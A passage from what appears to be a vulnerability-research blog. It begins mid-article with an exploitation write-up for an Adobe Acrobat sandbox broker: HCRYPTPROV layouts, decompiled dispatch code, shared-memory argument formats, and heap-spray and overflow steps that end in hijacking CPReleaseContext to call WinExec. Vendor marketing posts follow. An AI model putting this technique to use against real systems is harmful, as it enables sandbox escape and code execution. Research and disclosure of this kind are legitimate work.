HCRYPTPROV is the object instantiated and used by CryptSP.dll to dispatch calls to the right provider. It can be instantiated via the CryptAcquireContext() API, that returns an instantiated HCRYPTPROV object.

HCRYPTPROV is a basic C structure containing function pointers to the provider exposed routine. In this way, calling CryptSP.dll:CryptImportKey() executes HCRYPTPROV->FunctionPointer() that corresponds to provider.dll:CPImportKey().

The HCRYPTPROV data structure is shown below:

					Offset      Length (bytes)    Field                   Description
---------   --------------    --------------------    ----------------------------------------------
0x00        8                 CPAcquireContext          Function pointer exposed by Crypto Provider
0x08        8                 CPReleaseContext          Function pointer exposed by Crypto Provider
0x10        8                 CPGenKey                  Function pointer exposed by Crypto Provider
0x18        8                 CPDeriveKey               Function pointer exposed by Crypto Provider
0x20        8                 CPDestroyKey              Function pointer exposed by Crypto Provider
0x28        8                 CPSetKeyParam             Function pointer exposed by Crypto Provider
0x30        8                 CPGetKeyParam             Function pointer exposed by Crypto Provider
0x38        8                 CPExportKey               Function pointer exposed by Crypto Provider
0x40        8                 CPImportKey               Function pointer exposed by Crypto Provider
0x48        8                 CPEncrypt                 Function pointer exposed by Crypto Provider
0x50        8                 CPDecrypt                 Function pointer exposed by Crypto Provider
0x58        8                 CPCreateHash              Function pointer exposed by Crypto Provider
0x60        8                 CPHashData                Function pointer exposed by Crypto Provider
0x68        8                 CPHashSessionKey          Function pointer exposed by Crypto Provider
0x70        8                 CPDestroyHash             Function pointer exposed by Crypto Provider
0x78        8                 CPSignHash                Function pointer exposed by Crypto Provider
0x80        8                 CPVerifySignature         Function pointer exposed by Crypto Provider
0x88        8                 CPGenRandom               Function pointer exposed by Crypto Provider
0x90        8                 CPGetUserKey              Function pointer exposed by Crypto Provider
0x98        8                 CPSetProvParam            Function pointer exposed by Crypto Provider
0xa0        8                 CPGetProvParam            Function pointer exposed by Crypto Provider
0xa8        8                 CPSetHashParam            Function pointer exposed by Crypto Provider
0xb0        8                 CPGetHashParam            Function pointer exposed by Crypto Provider
0xb8        8                 Unknown                   Unknown
0xc0        8                 CPDuplicateKey            Function pointer exposed by Crypto Provider
0xc8        8                 CPDuplicateHash           Function pointer exposed by Crypto Provider
0xd0        8                 Unknown                   Unknown
0xd8        8                 CryptoProviderHANDLE      Crypto Provider library base address
0xe0        8                 EncryptedCryptoProvObj    Crypto Provider object's encrypted pointer
0xe8        4                 Const Val                 Constant value set to 0x11111111
0xec        4                 Const Val                 Constant value set to 0x1
0xf0        4                 Const Val                 Constant value set to 0x1
CryptSP dispatch using HCRYPTPROV

When a CryptSP.dll API is invoked the HCRYPTPROV object is used to dispatch the flow to the right provider routine. At offset 0xe0 the HCRYPTPROV object contains the real provider object that is used internally in the provider routines. When CryptSP.dll dispatches the call to the provider it passes the real provider object contained at HCRYPTOPROV + 0xe0 as the first argument.

					// CryptSP.dll

BOOL __stdcall CryptImportKey(
        HCRYPTPROV hProv,
        const BYTE *pbData,
        DWORD dwDataLen,
        HCRYPTKEY hPubKey,
        DWORD dwFlags,
        HCRYPTKEY *phKey)



    if ( (*(__int64 (__fastcall **)(_QWORD, const BYTE *, _QWORD, __int64, DWORD, HCRYPTKEY *))(hProv + 0x40))(
           *(_QWORD *)(hProv + 0xE0),
           phKey) )
        if ( (dwFlags &amp; 8) == 0 )
            v9[11] = *phKey;
            *phKey = (HCRYPTKEY)v9;
            v9[10] = hProv;
            *((_DWORD *)v9 + 24) = 572662306;
        v8 = 1;



At [1], we see an example how CryptSP.dll dispatches the code to the provider:CPImportKey() routine.

Crypto Provider Abuse

The Crypto Providers’ interface uses the HCRYPTPROV object to redirect the execution flow to the right Crypto Provider API. When the interface redirects the execution flow it sets the encrypted pointer located at HCRYPTPROV + 0xe0 as the first argument. Therefore, by overwriting the function pointer and the encrypted pointer, an attacker can redirect the execution flow while controlling the first argument.

Adobe Acrobat – CryptGenRandom abuse to identify corrupted objects

The Adobe Acrobat broker provides the CryptGenRandom() cross-call to the sandbox. If the CPGenRandom() function pointer has been overwritten with a function having a predictable return value different from the return value of the original CryptGenRandom() function, then it is possible to determine that a HCRYPTPROV object has been overwritten.

For example, if a pointer to the absolute value function, ntdll!abs, is used to override the CPGenRandom() function pointer, the broker executes abs(HCRYPTPROV + 0xe0) instead of CPGenRandom(). Therefore, by setting a known value at HCRYPTPROV + 0xe0, this cross-call can be abused by an attacker to identify whether the HCRYPTPROV object has been overwritten by checking if its return value is abs(<known value>).

Adobe Acrobat – CryptReleaseContext abuse to execute commands

The Adobe Acrobat broker provides the CryptReleaseContext() cross-call to the sandbox. This cross-call ends up calling CPReleaseContext(HCRYPTPROV + 0xe0, 0). By overwriting the CPReleaseContext() function pointer in HCRYPTPROV with WinExec() and by overwriting HCRYPTPROV + 0xe0 with a previously corrupted HCRYPTPROV object, one can execute WinExec with an arbitrary lpCmdLine argument, thereby executing arbitrary commands.

Shared Memory Structure – overwriting contiguous HCRYPTPROV objects.

In the following we describe the shared memory structure and more specifically how arguments for cross-calls are stored. The layout of the shared memory structure is relevant when the integer overflow is used to overwrite the function pointers in contiguous HCRYPTPROV objects.

The share memory structure is shown below:

					Field                   Description
--------------------    --------------------------------------------------------------
Shared Memory Header    Contains main shared memory information like channel numbers.
Channel 0 Header        Contains main channel information like Event handles.
Channel 1 Header        Contains main channel information like Event handles.
Channel N Header        Contains main channel information like Event handles.
Channel 0               Channel memory zone, where the request/response is written.
Channel 1               Channel memory zone, where the request/response is written.
Channel N               Channel memory zone, where the request/response is written.

The shared memory main header is shown below:

					Offset      Length (bytes)    Field                   Description
---------   --------------    --------------------    -------------------------------------------
0x00           0x04           Channel number          Contains the number of channels available.
0x04           0x04           Unknown                 Unknown
0x08           0x08           Mutant HANDLE           Unknown

The channel main header data structure is shown below. The offsets are relative to the channel main header.

					Offset      Length (bytes)    Field                   Description
---------   --------------    --------------------    -------------------------------------------
0x00           0x08           Channel offset          Offset to the channel memory region for
                                                      storing/reading request relative to share
                                                      memory base address.
0x08           0x08           Channel state           Value representing the state of the channel:
                                                      1 Free, 2 in use by sandbox, 3 in use by broker.
0x10           0x08           Event Ping Handle       Event used by sandbox to signal broker that
                                                      there is a request in the channel.
0x18           0x08           Event Pong Handle       Event used by broker to signal sandbox that
                                                      there is a response in the channel.
0x20           0x08           Event Handle            Unknown

Since the shared memory is 2MB and the header is 0x10 bytes long and every channel header is 0x28 bytes long, every channel takes (2MB - 0x10 - N*0x28) / N bytes.

The shared memory channels are used to store the serialization of the cross-call input parameters and return values. Every channel memory region, located at shared_memory_address + channel_main_header[i].channel_offset, is implemented as the following data structure:

					Offset      Length (bytes)    Field                   Description
---------   --------------    --------------------    -----------------------------------------------
0x00           0x04           Tag ID                  Tag ID is used by the broker to dispatch the
                                                      request to the exposed cross-call.
0x04           0x04           In Out                  Boolean, if set the broker copy-back in the
                                                      channel the content of the arguments after the
                                                      cross-call. It is used when parameters are
                                                      output parameters, e.g. GetCurrentDirectory().
0x08           0x08           Unknown                 Unknown
0x10           0x04           Error Code              Windows Last Error set by the broker after the
                                                      cross-call to inform sandbox about error status.
0x14           0x04           Status                  Broker sets to 1 if the cross-call has been
                                                      executed otherwise it sets to 0.
0x18           0x08           HANDLE                  Handle returned by the cross call
0x20           0x04           Return Code             Exposed cross-call return value.
0x24           0x3c           Unknown                 Unknown
0x60           0x04           Args Number             Number of argument present in the cross-call
                                                      emitted by the sandbox.
0x64           0x04           Unknown                 Unknown
0x68           Variable       Arguments               Data structure representing every argument
[ Truncated ]

At most 20 arguments can be set for a request but only the required arguments need to be specified. It means that if the cross-call requires two arguments then Args Number will be set to 2 and the Arguments data structure contains two elements of the Argument type. Every argument uses the following data structure:

					Offset     Length (bytes)    Field                   Description
---------  --------------    --------------------    --------------------------------------------------
0x0        4                 Argument type           Integer representing the argument type.
0x4        4                 Argument offset         Offset relative to the channel address, i.e. Tag
                                                     ID address, used to localize the argument value in the channel self
0x8        4                 Argument size           The argument's size.

Each of the argument data structures must be followed by another one that contains only the offset field filled with an offset greater than the last valid argument’s offset plus its own size, i.e argument[n].offset + argument[n].size + 1. Therefore, if a cross-call needs two arguments then three arguments must be set: two representing the valid arguments to pass to the cross-call and the third set to where the arguments end.

Shown below is an example of the arguments in a two-argument cross-call:

					Offset         Length (bytes)    Field
---------      --------------    --------------------
0x68           4                 Argument 0 type
0x6c           4                 Argument 0 offset
0x70           4                 Argument 0 size
0x74           4                 Argument 1 type
0x78           4                 Argument 1 offset
0x7c           4                 Argument 1 size
0x80           4                 Not Used
0x84           4                 Argument 1 offset + Argument 1 size + 1: 0x90 + N + M + 1
0x8c           4                 Not Used
0x90           N                 Argument 0 value
0x90 + N       M                 Argument 1 value
An Argument can be one of the following types:
					Argument type       Argument name         Description
--------------      ------------------    -------------------------------------------------------------
0x01                WCHAR String          Specify a wide string.
0x02                DWORD                 Specify an int 32 bits argument.
0x04                QWORD                 Specify an int 64 bits argument.
0x05                INPTR                 Specify an input pointer, already instantiated on the broker.
0x06                INOUTPTR              Specify an argument treated like a pointer in the cross-call
                                          handler. It is used as input or  output, i.e. return to the
                                          sandbox a broker valid memory pointer.
0x07                ASCII String          Specify an ascii string argument.
0x08                0x18 Bytes struct     Specify a structure long 0x18 bytes.

When an argument is of the INOUTPTR type (intended to be used for all non-primitive data types), then the cross-call handler treats it in the following way:

  1. Allocates 16 bytes where the first 8 bytes contain the argument size and the last 8 bytes the pointer received.
  2. If the argument is an input pointer for the final API then it is checked to be valid against a list of valid pointers before passing it as a parameter for the final API.
  3. If the argument is an output pointer for the final API then the pointer is allocated and filled by the final API.
  4. If the INOUT cross-call type is true then the pointer address is copied back to the sandbox.

Exploit Phases

The exploit consists of the following phases:

  1. Heap spraying – The sandbox process cross-calls CryptAcquireContext() N times in order to allocate multiple heap chunks of 0x100 bytes. The broker’s heap layout after the spray is shown below.
Broker heap layout after spray
  1. Abuse Adobe Acrobat design – Since the HCRYPTPTROV object is passed as a parameter to CryptAcquireContext() the pointer must be returned to the sandbox in order to allow using it for operations with Crypto Providers in the broker context. Because of this feature it is possible to find contiguous HCRYPTPROV objects.
  2. Holes creation – Releasing the contiguous chunks in an alternate way.
Creating holes in the broker process heap
  1. Import malicious key – The sandbox process cross-calls CryptImportKey() multiple times with a maliciously crafted key. It is expected that the key overflows into the next chunk, i.e. an HCRYPTPROV object. The overflow overwrites the initial bytes of the HCRYPTPROV object with a command string, CPGenRandom() with the address of ntdll!abs, and HCRYPTPROV + 0xe0 with a known value.
Overwriting the first HCRYPTPROV object
  1. Find overwritten object – The sandbox process cross-calls CryptGenRandom(). If it returns the known value then ntdll!abs() has been executed and the overwritten object has been found.
  2. Import malicious key – The sandbox process cross-calls CryptImportKey() multiple times with a maliciously crafted key. It is expected that the key overflows the next chunk, i.e. an HCRYPTPROV object. The overflow overwrites CPReleaseContext() with kernel32:WinExec(), CPGenRandom() with the address of ntdll!abs, and HCRYPTPROV + 0xe0 with the pointer to the object found in step 5.
Overwriting an HCRYPTPROV object a second time
  1. Find overwritten object – The sandbox process cross-calls CryptGenRandom(). If it returns the absolute value of the pointer found in step 5 then ntdll!abs() has been executed and the overwritten object has been found.
  2. Trigger – The sandbox process cross-calls CryptReleaseContext() on the HCRYPTPROV object found in step 7 to trigger WinExec().

Wrapping Up

We hope you enjoyed reading this. If you are hungry for more make sure to check our other blog posts.

An Unpatched Vulnerability, A Substantial Liability

An Unpatched Vulnerability, A Substantial Liability

Even the largest and most mature enterprises have trouble finding and patching vulnerabilities in a timely fashion. As we see in this article challenges include getting patches pushed through a sophisticated supply chain and ultimately to a system whose end user may have devices configured to not allow automated remote patch application. We see this play out with every product that contains a line of code, from the simplest programs to large SaaS platforms with stringent performance, scalability, and availability requirements: patches need to be implemented at the earliest opportunity in order to avert catastrophe.

This plague of failing to patch vulnerabilities is infesting enterprises globally and is spreading like wildfire. It seems that nearly every day brings another breach, another company forced to spend millions reacting after the fact to a threat that may have been prevented. These attacks are often successful due to unpatched systems.  Victim companies that could have been proactive and taken measures to prevent these attacks, now find themselves in the spotlight with diminished reputation, the possibility of regulatory fines, and lost revenue. 

We see this pattern far too often and want to help. Exodus Intelligence’s new EVE (Exodus Vulnerability Enrichment) platform delivers real time updates on things that your security team needs to be worried about and helps you prioritize patches with our exclusive XI score that shows you which vulnerabilities are most likely to be exploited in the wild. EVE combines insight regarding known vulnerabilities from our world class researchers with supervised machine learning analysis and carefully curated public data to make available the most actional intelligence in the quickest possible manner. 

EVE is a critical tool in the war against cyberattacks in the commercial sector, allowing companies to leverage the same Exodus data trusted by governments and agencies for more than a decade. Never let your business be put in the position of reacting to an attack, get EVE from Exodus Intelligence and be proactive rather than reactive.

About Exodus Intelligence

We provide clients with actionable information, capabilities, and context for proven exploitable vulnerabilities.  Our world class team of vulnerability researchers discover hundreds of exclusive Zero-Day vulnerabilities, providing our clients with this knowledge before the adversaries find them.  Our research also extends into the world on N-Day research, where we select critical N-Day vulnerabilities and complete research to prove whether these vulnerabilities are truly exploitable in the wild.  

For more information, visit or contact for further discussion.

The Death Star Needed Vulnerability Intelligence

The Death Star Needed Vulnerability Intelligence

Darth Vader and his evil colleagues aboard the Death Star could have seriously benefited from world-class vulnerability intelligence. Luckily for the Rebel Alliance, Vader was too focused on threat intelligence alone.

If you’ve ever seen the original Star Wars story, you might recall that the evil Empire was confident with their defensive intelligence as well as their seemingly impenetrable defensive systems. Their intel notified them of every X-Wing, pilot, and droid headed in their direction. They were flush with anti-aircraft turrets, tie fighters, and lasers to attack those inbound threats. 

The Death Star was a fortress—right?

This approach to security isn’t unlike the networks and systems of many companies who have a vast amount of threat intelligence reporting on all known exploits in exceptional detail. Sometimes, though, lost in the noise of all the threats reported, there is a small opening. If exploited, that small opening can lead to a chain reaction of destruction. The Rebel Alliance attacked the one vulnerability they found—with tremendous results to show for it. 

Unfortunately, there are bad actors out there who are also looking to attack your systems, who can and will find a way to penetrate your seemingly robust defenses. Herein lies the absolute necessity of vulnerability intelligence. 

Exodus provides world-class vulnerability intelligence entrusted by government agencies and Fortune 500 companies. We have a team of world class researchers with hundreds of years of combined experience, ready to identify your organization’s vulnerabilities, even the smallest of openings matter. With every vulnerability we detect, we neutralize thousands of potential exploits.

Learn more about our intelligence offerings and consider starting a trial:

For more information, visit  or to see trial offers.

Everything Old Is New Again

Everything Old Is New Again,
Exodus Has A Solution

It is said that those who are ignorant of history are doomed to repeat it, and this article from CSO shows that assertion reigns true in cybersecurity as well.  Threat actors are continuing to exploit vulnerabilities that have been known publicly since 2017 and earlier.  Compromised enterprises referenced in the article had five years or longer to patch or mitigate these vulnerabilities but failed to do so.  Rarely does a month go by without another article showcasing how companies are continuously compromised by patched vulnerabilities.  Why does this keep happening?

Things are hard and vulnerability management is no exception.  Many enterprises manage tens, or hundreds, of thousands of hosts, each of which may have any number of vulnerabilities at any given time.  As you may well imagine, monitoring such a vast and dynamic attack surface can be tremendously challenging.  The vulnerability state potentially changes on each host with every application installed, patch applied, and configuration modified.  Given the numbers of vulnerabilities cited in the CSO article previously mentioned, tens of thousands of vulnerabilities reported per year and increasing, how can anything short of a small army ever hope to plug these critical infrastructure holes?

If you accept that there is no reasonable way to patch or mitigate every single vulnerability then you must pivot to prioritizing vulnerabilities and managing a reasonable volume off the top, therefore minimizing risk in the context of available resources.  There are many ways to prioritize vulnerabilities, provided you have the necessary vulnerability intelligence to do so.  Filter out all vulnerabilities on platforms that do not exist in your environment.  Focus on those vulnerabilities that exist on public-facing hosts and then work inward.  As you are considering these relevant vulnerabilities, sort them by the likelihood of each being exploited in the wild.

Exodus Intelligence makes this type of vulnerability intelligence and much more available in our EVE (Exodus Vulnerability Enrichment) platform.  Input CPEs that exist within your environment into the EVE platform and see visualizations of vulnerability data that apply specifically to you.  We combine carefully curated public data with our own machine learning analysis and original research from some of the best security minds in the world and allow you to visualize and search it all.  You can also configure custom queries with results that you care about, schedule them to run on a recurring basis, and send you a notification when a vulnerability is published that meets your criteria.

About Exodus Intelligence

We provide clients with actionable information, capabilities, and context for proven exploitable vulnerabilities.  Our world class team of vulnerability researchers discover hundreds of exclusive Zero-Day vulnerabilities, providing our clients with this knowledge before the adversaries find them.  Our research also extends into the world on N-Day research, where we select critical N-Day vulnerabilities and complete research to prove whether these vulnerabilities are truly exploitable in the wild.  


For more information, visit or contact for further discussion.

CISA Urges Caution, One Year On From Invasion of Ukraine

CISA Urges Caution, One Year On From Invasion of Ukraine

One year removed from Russia’s invasion of Ukraine, CISA has issued a warning to the United States and its European allies: increased cyber-attacks may be headed to your network.

 As tensions abroad remain high, the cyber landscape will be an extension of the physical battleground. More than ever, understanding where and how your organization is vulnerable is an essential part of risk management.

 At Exodus Intelligence, the leader in vulnerability intelligence, we seek to proactively understand your organization’s vulnerabilities, to assess the associated risk of those vulnerabilities, and to provide focused mitigation guidance based on our expert research.

 Rather than fighting thousands of threats individually, Exodus focuses on neutralizing thousands of potential exploits all at once, by addressing the root cause of your system’s vulnerabilities.

 Be sure to follow along with CISA alerts and advisories to remain vigilant on the developing threat landscape during this turbulent time. We have extensive coverage of the vulnerabilities in CISA’s Known Exploited Vulnerabilities catalog and provide mitigation guidance on those vulnerabilities to ensure your organization stays protected.

 Learn more about our product offerings and solutions to see how we can protect your organization:




Exodus Intelligence Launches EVE Vulnerability Intelligence Platform Targeting Commercial Enterprises

Exodus Intelligence Launches EVE Vulnerability Intelligence Platform Targeting Commercial Enterprises

Today Exodus Intelligence is excited to announce EVE (Exodus Vulnerability Enrichment), our world-class vulnerability intelligence platform. EVE allows a wide range of security operations professionals to leverage Exodus’ state-level vulnerability research. This allows those professionals to prioritize mitigation and remediation efforts, enrich event data and incidents, be alerted to new noteworthy vulnerabilities relevant to their systems, and take advantage of many other available use cases valuable in defending their critical infrastructure.

EVE makes our robust intelligence available for the first time to enterprises for use in the defense of growing cyberattacks.  The API to the Exodus body of research enables us to provide simple, out of the box integration with SIEMs, SOARs, ticketing systems and other infrastructure components that can employ contextual data.  Additionally, it enables security operations teams to develop their own custom tooling and applications and integrate our vulnerability research.

Organizations with the ability to develop automation playbooks and other tools have been able to enrich available security data, enhance investigation and incident response capabilities, prioritize vulnerability remediation efforts, and more. We can now expand that capability and visibility to the rest of the security operations team with EVE. 

EVE provides users with an intuitive interface to Exodus’ intelligence corpus made up of original research, machine learning analysis, and carefully curated public data.  This interface includes regular automated updates to intelligence data, integration with environment-specific platform and vulnerability data, interactive visualizations that operationalize the research data for SOC analysts and risk management personnel, multidimensional search capability including filters which narrow results to only vulnerabilities that exist in the user’s environment and are likely to be exploited, and the ability to schedule searches to run on a recurring basis and email alerts to the user.

EVE capabilities include:

  • Dynamic, automated intelligence feed: Vulnerability research data is updated at minimum once per day with likelihood of a vulnerability to be exploited (XI Score), mitigation guidance, and other original research combined with curated public vulnerability data to maximize visibility of the attack surface.
  • Integration with the IT ecosystem: CPE data from vulnerability scans of the infrastructure can be input into EVE and applied as context to searches and visualizations keeping focus on relevant vulnerabilities.
  • Smart data visualization: The dashboard provides a wealth of information including a real-time likelihood that an existing vulnerability will be exploited in the environment, vulnerabilities grouped and sorted by categories such as attack vector or disclosure month, and which platforms in the environment have the most vulnerabilities. All visualizations are interactive allowing the user to drill into the vulnerability details making the data actionable.

About Exodus Intelligence

We provide clients with actionable information, capabilities, and context for proven exploitable vulnerabilities.  Our world class team of vulnerability researchers discover hundreds of exclusive Zero-Day vulnerabilities, providing our clients with this knowledge before the adversaries find them.  Our research also extends into the world on N-Day research, where we select critical N-Day vulnerabilities and complete research to prove whether these vulnerabilities are truly exploitable in the wild.  

For more information, visit or contact for further discussion.

Exodus Intelligence has been authorized by the CVE Program as a CVE Numbering Authority (CNA).

Exodus Intelligence has been authorized by the CVE Program as a CVE Numbering Authority (CNA).

Exodus Intelligence, the leader in Vulnerability Research, today announced it has been authorized by the CVE Program as a CVE Numbering Authority (CNA).  As a CNA, Exodus is authorized to assign CVE IDs to newly discovered vulnerabilities and publicly disclose information about these vulnerabilities through CVE Records.

“Exodus is proud to be authorized as a CVE Numbering Authority which will allow us to work even more closely with the security community in identifying critically exploitable vulnerabilities,” said Logan Brown, Founder and CEO of Exodus.

The CVE Program is sponsored by the Cybersecurity and Infrastructure Security Agency (CISA), of the U.S. Department of Homeland Security (DHS) in close collaboration with international industry, academic, and government stakeholders. It is an international, community-based effort with a mission to identify, define, and catalog publicly disclosed cybersecurity vulnerabilities. The mission of CVE is to identify, define, and catalog publicly disclosed cybersecurity vulnerabilities. The discovered vulnerabilities are then assigned and published to the CVE List, which feeds the U.S. National Vulnerability Database (NVD). Exodus joins a global list of 269 trusted partners across 35 countries committed to strengthening the global cyber security community through discovering and sharing valuable cyber intelligence.

About Exodus Intelligence

Exodus employs some of the world’s most advanced reverse engineers and exploit developers to provide Government and Enterprise the unique ability to understand, prepare, and defend against the ever-changing landscape of Cyber Security. By providing customers with actionable Vulnerability Intelligence including deep vulnerability analysis, detection and mitigation guidance, and tooling to test defenses, our customers receive leading edge insights to harden their network or achieve mission success.

All-time High Cybersecurity Attrition + Economic Uncertainty = Happy(ish) New Year 

All-time High Cybersecurity Attrition + Economic Uncertainty = Happy(ish) New Year

As 2023 fires up, so do the attrition numbers across the Cybersecurity vertical.  With bonuses being paid and cybersecurity professionals searching for the next great job, vulnerability management teams are understaffed with growing concerns around finding qualified cybersecurity candidates to fill once occupied roles.  To amplify the situation, 2023 looks to be the year of ‘economic uncertainty’, sparking layoffs and budget contractions as companies brace for a potential recession.  These compounding factors put already overworked vulnerability management teams behind the curve as malicious threats become more frequent and more sophisticated. 

Exodus Intelligence is here to help. 

In response to the soaring attrition numbers and lack of qualified talent, Exodus Intelligence wants to help in making vulnerability management teams more efficient.  Exodus is offering their N-Day vulnerability subscription for FREE for 1 month for all users registered no later than January 31st.  Exodus brings 300+ years of vulnerability research expertise and the trust of governments and Fortune 500 organizations to mitigate the most critical vulnerabilities in existence. Simply put – you receive 35 world-class reserachers at no cost. 

The N-Day Vulnerability subscription provides customers with intelligence about critically exploitable, publicly disclosed vulnerabilities on widely used software, hardware, embedded devices, and industrial control systems.  Every vulnerability is analyzed, documented, and enriched with high-impact intelligence derived by some of the best reverse engineers in the world. At times, vendor patches fail to properly secure the underlying vulnerability.  Exodus Intelligence’s proprietary research enhances patch management efforts. Subscribed customers have access to an arsenal of more than 1200 vulnerability intelligence packages to ensure defensive measures are properly implemented. 

For those that are concerned about Zero-day vulnerabilities, Exodus is also offering the benefit of our Zero-day vulnerability subscription for up to 50% off for new registrations no later than January 31st.  Exodus’ Zero-day Subscription provides customers with critically exploitable vulnerability reports, unknown to the public, affecting widely used and relied upon software, hardware, embedded devices, and industrial control systems. Customers will gain access to a proprietary library of over 200 Zero-day vulnerability reports in addition to proof of concept exploits and highly enriched vulnerability intelligence packages. These Zero-day Vulnerability Intelligence packages, unavailable anywhere else, enable customers to reduce their mean time to detect and mitigate critically exploitable vulnerabilities. 

These offerings are available to the United States (and allied countries) Private and Public Sectors to gain the immediate benefit of advanced vulnerability analysis, mitigation guidance/signatures, and proof-of-concepts to test against current defenses. 

To register for FREE N-day Intelligence, please fill out the webform here 

Sample Report